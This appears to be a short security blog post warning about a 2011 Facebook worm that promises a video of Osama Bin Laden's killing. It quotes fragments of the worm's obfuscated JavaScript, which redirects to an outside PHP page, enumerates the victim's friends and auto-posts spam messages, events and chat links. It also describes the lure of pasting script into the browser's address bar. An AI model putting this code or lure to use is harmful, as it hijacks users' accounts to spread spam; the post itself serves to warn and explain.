Osama Bin Laden killed live on a news broadcast! watch the video: …

A worm has started to spread over Facebook promising
the user a video where the killed Osama Bin Laden can be seen.

The link is:


On the corresponding Facebook profile you are asked to copy a javascript line following line into the browser’s location bar which reloads a JavaScript file named “bin.js” from a doubtful source.

  1. In line 3 the message to be send to all of your friends is defined.
  2. In lines 149 – 179 all of your friends are enumerated.
  3. The following lines send a spam message asking them to open the killing video themselves.
var randomnumber=Math.floor(Math.random()*99999);
var chatmessage = '%firstname% watch the video of them killing osama bin laden live! facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var postmessage = 'Osama Bin Laden killed live on a news broadcast! watch the video: http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196&'+randomnumber;
var redirect = 'http://jonathangalt.com/facebook/bin.php';
var eventdesc = 'Hey everyone, \n\ fb now lets you see who viewed your profile! to enable this feature, go here! - http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Live-on-Video/201198676585608?sk=app_190322544333196';
var eventname = 'Check out this cool page!';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect;
            }, 500);
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            _0xaa04x18['innerHTML'] = ' <br/>Please wait, this can take a little while...<br/><br/> We are loading the video... If the video fails to load <a href="javascript:void(0);" onclick="wf=0; mf();">click here</a> ';
    var _0xaa04x19 = _0xaa04xf['match'](/name=\\"xhpc_composerid\\" value=\\"([\d\w]+)\\"/i);
    if (_0xaa04x19) {
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                    save: 'Create Event',
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                _0xaa04x25['new'] = '';
                _0xaa04x16('/events/create.php', _0xaa04x25, false, function () {
    if (chatmessage) {
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                        id: _0xaa04x23,
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                    _0xaa04x35['xhpc_message_text'] = _0xaa04x36;
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                    _0xaa04x16('/ajax/updatestatus.php?__a=1', _0xaa04x35);
                    setTimeout(function () {
                        _0xaa04x33(_0xaa04x15 - 1);
                    }, 2000);
            setTimeout(function () {
            }, 2000);

You want a Bin Laden video?
Then you better consult a more official channel like Youtube.